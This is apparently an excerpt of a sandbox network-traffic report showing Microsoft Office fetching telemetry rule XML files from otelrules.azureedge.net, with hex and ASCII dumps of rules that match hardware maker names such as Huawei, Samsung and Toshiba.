                                                          2024-12-02 16:56:17 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          42192.168.2.44980013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:19 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:19 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:19 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 428
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                          ETag: "0x8DC582BAC4F34CA"
                                                          x-ms-request-id: 14e4a643-101e-007a-3c66-40047e000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165619Z-174f7845968nxc96hC1EWRspw800000014ag00000000wdhf
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:19 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          43192.168.2.44980113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:19 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:19 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:19 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 499
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                          ETag: "0x8DC582B98CEC9F6"
                                                          x-ms-request-id: 89e88ad2-001e-0065-4491-3f0b73000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165619Z-174f7845968zgtf6hC1EWRqd8s0000000xqg000000009406
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:19 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          44192.168.2.44980213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:19 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:19 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:19 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 415
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                          ETag: "0x8DC582B988EBD12"
                                                          x-ms-request-id: 3f9ecb84-b01e-0002-696f-401b8f000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165619Z-174f7845968nxc96hC1EWRspw800000014d000000000m8xy
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:19 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          45192.168.2.44980313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:19 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:19 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:19 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 471
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                          ETag: "0x8DC582BB5815C4C"
                                                          x-ms-request-id: e7678828-401e-0078-7a85-434d34000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165619Z-174f7845968xlwnmhC1EWR0sv800000014fg00000000p5em
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:19 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          46192.168.2.44980413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:21 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:21 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:21 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 419
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                          ETag: "0x8DC582BB32BB5CB"
                                                          x-ms-request-id: 2132beec-901e-00ac-46aa-42b69e000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165621Z-174f7845968glpgnhC1EWR7uec00000014xg00000000737c
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:21 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          47192.168.2.44980613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:21 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:21 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:21 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 420
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                          ETag: "0x8DC582B9DAE3EC0"
                                                          x-ms-request-id: 09e3fb4a-a01e-006f-48a1-4213cd000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165621Z-174f78459685726chC1EWRsnbg00000014q000000000rf0q
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:21 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          48192.168.2.44980513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:21 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:21 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:21 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 494
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                          ETag: "0x8DC582BB8972972"
                                                          x-ms-request-id: 1e31e9ea-701e-0098-028a-43395f000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165621Z-174f7845968j6t2phC1EWRcfe800000014x0000000009fh7
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:21 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          49192.168.2.44980713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:21 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:21 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:21 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 472
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                          ETag: "0x8DC582B9D43097E"
                                                          x-ms-request-id: c0407c6d-d01e-0082-369d-43e489000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165621Z-174f78459685m244hC1EWRgp2c00000014fg00000000nz3e
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:21 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          50192.168.2.44979013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:21 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:22 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:22 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 469
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                          ETag: "0x8DC582BBA701121"
                                                          x-ms-request-id: 1f885eed-401e-0029-2ba8-429b43000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165622Z-174f7845968nxc96hC1EWRspw800000014gg000000006ggp
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:22 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          51192.168.2.44980813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:23 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:23 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:23 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 427
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                          ETag: "0x8DC582BA909FA21"
                                                          x-ms-request-id: b5d3fb3c-c01e-000b-6fb4-42e255000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165623Z-174f7845968px8v7hC1EWR08ng0000001510000000005ntg
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:23 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          52192.168.2.44980913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:23 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:23 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:23 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 486
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                          ETag: "0x8DC582B92FCB436"
                                                          x-ms-request-id: 716ae074-c01e-0046-576f-432db9000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165623Z-174f7845968j6t2phC1EWRcfe800000014s000000000w5ga
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
